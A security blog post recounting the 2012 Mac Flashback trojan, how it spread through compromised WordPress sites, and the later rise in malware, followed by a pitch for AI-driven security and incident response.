Not so long ago, the Mac was thought to be impervious to viruses. In fact, Apple once stated on its website that “it doesn’t get PC viruses”. But that was before the Mac OS X Trojan Flashback malware appeared in 2012.

Since then, Mac and iPhone security issues have changed dramatically — and so has the security of the entire world. In this post, we’ll revisit how the Flashback incident unfolded and how it changed the security landscape forever.

What is the Mac Flashback Trojan?

Flashback (also called Flashfake) is a type of Mac OS X malware first detected in September 2011. By March 2012, the trojan had infected around 700,000 computers worldwide. After infection, compromised PCs were recruited into a botnet that enabled the installation of additional malicious code. One of the malware’s objectives was to generate fake search engine results.

According to researchers, threat actors used Flashback to siphon Google ad revenue. The trojan’s ad-clicking component loaded into Chrome, Firefox and Safari, where it could intercept browser requests and redirect specific search queries to a page of the attacker’s choosing. From there, criminals raked in click-generated revenue totaling about $10,000 per day.

Infected Through WordPress

According to Kaspersky, Flashback malware spread thanks to a threat partner program that appeared to be of Russian origin.

The program implemented script redirects from huge numbers of legitimate websites worldwide. By early March 2012, the program had infected tens of thousands of sites powered by WordPress. This might have occurred due to site owners using vulnerable WordPress versions or installing the ToolsPack plugin. Approximately 85% of the compromised sites were located in the US.

When any of the infected sites were visited, a tabular data stream (TDS) was contacted. The browser could then perform a hidden redirect to sites in the rr.nu domain zone. The rogue sites had Flashback exploits installed on them to execute the malware.

A New Reality for iOS and macOS

News of Flashback shook the entire cybersecurity and tech industry. The Mac OS, once considered a haven against viruses, had fallen. And it was not an isolated event. Soon after, in April 2012, a new Mac OS X trojan was discovered.

Fast forward to the present day, and the vulnerabilities continue to multiply. In August 2022, the Apple Support site published security updates for iOS 15.6.1 and iPadOS 15.6.1 and macOS Monterey 12.5.1. Theoretically, these vulnerabilities give a hacker full admin access to the device. This would allow intruders to impersonate the device’s owner and subsequently run any software in their name.

While these weaknesses make headlines, the reality is that no system is immune to security threats. You only need to browse the Apple and Microsoft security updates pages to see the extent of the issues discovered. Alongside these concerns, threat actors have only increased their efforts to find and exploit every vulnerability.

Malware Development is on the Rise

Macs or iPhones are still safe compared to other options: their built-in security remains above par. But no OS is entirely secure anymore, if they ever were, to begin with.

Consider these chilling facts. According to Atlas VPN, macOS malware development surged by over 1,000% in 2020, with a total of 674,273 malware samples. Compare that to Windows, which faced over 91 million samples in 2020.

In some ways, the Flashback incident marked a moment in history when attack rates began to increase significantly. For example, from 2012 to 2013, the malware infection growth rate more than doubled from 82.62 million to 165.81 million incidents. Also, monetary damage caused by cyber crime reported to the IC3 increased by over 200 million between 2012 and 2013. From there, incident rates and costs have ramped up quickly and show no signs of slowing.

Currently, many factors contribute to this rise. For starters, more people working from home widely increases attack surfaces. The conflict in Ukraine, cheap attack services and a tight security labor market also contribute. All these factors dramatically increase the pressure on security teams.

The IBM Cost of a Data Breach 2022 report revealed that 83% of organizations studied have had more than one data breach. These new realities make security not only a top business concern but also a core element of overall business strategy.

New Threats Require New Tools

If the Trojan Flashback was a bellwether event, it might have ushered in a new way of thinking about security. If no system is entirely secure, then mitigating tools must be more adaptive and intelligent. Rather than hoping to install a failsafe system, approaches such as threat intelligence, zero trust and AI-driven security are remodeling how we think about security.

Applications and devices are proliferating exponentially. Remote work is on the rise. Companies continue to migrate their networks to the cloud. By definition, we live and work in a perimeter-less reality, and our security solutions must evolve to serve us there.

The stakes couldn’t be higher. We’ve seen critical infrastructure like the Colonial Pipeline attacked. Government agencies and agriculture are under increasing pressure as well. Even top-tier security firms have been hacked. And the conflict between Russia and Ukraine has raised the stakes even higher than anyone imagined.

Sitting still and hoping that luck or flimsy security solutions will suffice is no longer an option. We need entirely new ways to protect people, IT assets, governments, businesses and entire societies.

Adapting to Security Challenges

Despite the rising number of threats, security professionals are stepping up to the challenge with measurable results. For instance, the IBM report revealed that:

  • Companies saved an average of $3.05 million per breach with fully deployed security AI and automation
  • Average cost savings of $2.66 million was associated with an incident response (IR) team and regularly tested IR plan
  • Savings in response time of 29 days for those with extended detection and response (XDR) technologies.

Perhaps nobody will ever again be able to say, “it doesn’t get PC viruses”. But we will continue to develop new ways to thwart threats to our security. Innovation and hard work pay off. And they can help secure our future.

More from Mobile Security

Switching to 5G? Know Your Integrated Security Controls

5G is a big leap in mobile technology. It presents enterprises and service providers with capabilities for advanced applications, content delivery and digital engagement anywhere. It enables businesses with new use cases and integrated security needs to have a trusted network and application/data delivery function. How does one build a secure 5G network that provides the level of trust required by users today and in the future? The Benefits of 5G 5G's new use cases come from: Customized network slices…

IAM Secures the New, Perimeter-less Reality

Necessity may be the mother of invention, and it also drives change. To remain competitive in 2021, companies had to transform rapidly. Today, many of us work from home. Remote and hybrid work models have become the new normal. But what about security? In one recent survey, 70% of office workers admitted to using their work devices for personal tasks, while 69% used personal laptops or printers for work. Also, 30% of remote workers let someone else use their work…

Will the Metaverse Usher in a Universe of Security Challenges?

How much do you know about the metaverse? Everyone started talking about the metaverse in the summer of 2021. Facebook CEO Mark Zuckerberg kicked it off with his plan to focus his company on building what he imagined would be the future of social, business, leisure and culture: the metaverse. He even changed the name of his company from Facebook to Meta. Since then, the chatter about the coming changes has been loud. Silicon Valley, the global tech industry, the…

The Most Important Security Takeaway from the October Facebook Outage

The massive October 4th Facebook outage was not due to a breach and was not classified as a security issue. But the fact that it went down — and was inaccessible for an extended period — is itself a security concern that the enterprise must address. That security concern is business continuity. According to reports, The Facebook outage was due to a misconfiguration of the border gateway protocol (BGP) that snowballed beyond its control. Somehow, as part of routine maintenance,…